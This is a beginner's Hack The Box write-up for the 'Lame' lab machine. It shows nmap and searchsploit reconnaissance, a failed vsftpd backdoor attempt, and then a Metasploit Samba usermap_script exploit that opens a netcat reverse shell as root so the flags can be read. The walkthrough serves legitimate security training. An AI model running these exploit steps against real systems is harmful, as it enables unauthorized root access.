HTB: Lame

This is far and away one of the easiest HTB boxes to complete. All you need is a copy of Nmap and Metasploit, both of which come with Kali Linux.

Start with an Nmap scan:

nmap -sSV -p0- -A

Breaking down the command arguments:

  • -sS – TCP SYN Stealth Scan
  • V – Print service versions where possible
  • -p0- – Scan all ports from 0 to 65535
  • -A – Run all safe scripts

The Nmap command should output the following:

Starting Nmap 7.80 ( ) at 2021-02-09 22:42 GMT
Nmap scan report for
Host is up (0.024s latency).
Not shown: 65531 filtered ports
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h36m16s, deviation: 3h32m10s, median: 6m14s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name:
|   FQDN:
|_  System time: 2021-02-09T17:50:41-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
1   23.71 ms
2   27.17 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 166.23 seconds

So there are a few things that are notable:

  • The FTP server allows anonymous access. That means if I run a command such as ftp and login as anonymous with no password, I have access to the FTP server, but the FTP server is empty. Not much can be done with this yet. Moving on.
  • The FTP server is noted as vsftpd 2.3.4 and the SMB server is noted as 3.0.20-Debian

Write these down somewhere, as chances are, we will need them later.

Our next step is to search for exploits. We will do this using a tool called ‘Searchsploit’, built into Kali Linux. First, lets search for vsftpd version 2.3.4:

searchsploit vsftpd 3.2.1

This should return the following:

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb

This tells us that an exploit exists for this service and version, but said exploit code only works with Metasploit – it won’t work with a standard Ruby interpreter like the .rb extension might suggest.

Let’s access Metasploit by launching msfconsole in terminal. You will be greeted by a new prompt that takes a very different set of commands. Commands to be entered into this new terminal will marked out with msf > at the beginning. Lets start by finding our exploit:

msf > search vsftpd

This should return a single entry with the line ‘exploit/unix/ftp/vsftpd_234_backdoor’, which sounds very much like our exploit mentioned in Searchsploit! To use the exploit, we type in the following command:

msf > use exploit/unix/ftp/vsftpd_234_backdoor

Success! we have loaded the exploit! Now to configure it as needed, we need to know what options there are to configure. Type in:

msf > options

You should see the following:

Module options (exploit/unix/ftp/vsftpd_234_backdoor):                                                                                                                                                                                    
   Name    Current Setting  Required  Description                                                                                                                                                                                         
   ----    ---------------  --------  -----------                                                                                                                                                                                         
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                                                                                                                  
   RPORT   21               yes       The target port (TCP)                                                                                                                                                                               
Payload options (cmd/unix/interact):                                                                                                                                                                                                      
   Name  Current Setting  Required  Description                                                                                                                                                                                           
   ----  ---------------  --------  -----------                                                                                                                                                                                           
Exploit target:                                                                                                                                                                                                                           
   Id  Name                                                                                                                                                                                                                               
   --  ----                                                                                                                                                                                                                               
   0   Automatic

Reading through this, we need to set the remote host, or RHOSTS value. We give this the IP of our target like so:

msf > set RHOSTS

And with that out of the way, we run the exploit:

msf > run
[*] - Banner: 220 (vsFTPd 2.3.4)
[*] - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Hmmm. Not quite what we were looking for there. It would appear that this service isn’t vulnerable after all. What do we do now? Maybe there is something in our notes that we haven’t fully covered yet?

Aha! There is another service we can potentially try! Let’s search it in Searchsploit!

> searchsploit samba 3.0.20
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                        | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)              | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                         | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                 | linux_x86/dos/
---------------------------------------------------------------------------------------------- ---------------------------------

That second exploit looks promising, and it’s another Metasploit one.

> msfconsole
msf > search samba username

Matching Modules

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution                                                            

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

That looks like our exploit! let’s load it in and see what options we need to fill out

msf > use exploit/multi/samba/usermap_script
msf > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

This time we have a bit more to fill out. Because the payload for this exploit is a reverse shell (meaning: the server is phoning home to us to give us control, rather than us going to the server), we need to tell the payload who to contact. The variable for this is LHOST. It may be filled out automatically, but that does not necessarily mean the value is correct. To derive the correct value, execute ip addr and find the IP address for the interface tun0. Fill out both the LHOST and RHOSTS variables as appropriate and run the exploit.

msf > set LHOST
msf > set RHOSTS
msf > run

[*] Started reverse TCP handler on 
[*] Command shell session 1 opened ( -> at 2021-02-12 00:36:24 +0000

It may look like nothing is happening, however, if you try to run the command whoami right now, you’ll get the response of root. This means that you are logged into the remote machine as the root user and can go after the flags in /root/root.txt and /home/makis/user.txt. Use the cat command to read the contents of the file.

Congratulations! You’ve passed your first HTB CTF. Unfortunately it was also the easiest one, and others will get a lot more in-depth. It’s all part of the learning process though, and we will be building our understanding of computer security as we go.